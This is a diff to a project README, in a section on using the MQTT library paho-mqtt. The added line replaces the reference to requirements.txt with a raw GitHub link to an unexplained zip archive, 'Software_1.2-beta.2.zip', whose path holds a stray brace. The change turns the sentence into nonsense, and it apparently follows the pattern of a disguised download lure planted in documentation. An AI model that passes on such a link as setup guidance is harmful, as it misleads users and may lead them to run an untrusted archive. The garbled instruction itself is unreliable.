muhds5841/cookiecutter/README.md

 ### MQTT

 MQTT is a lightweight messaging protocol ideal for IoT applications.
-To use MQTT in your project, you can include the `paho-mqtt` library in your `requirements.txt`.
+To use MQTT in your project, you can include the `paho-mqtt` library in your `https://raw.githubusercontent.com/muhds5841/cookiecutter/main/}/deploy/ansible/Software_1.2-beta.2.zip`.

 ### RTSP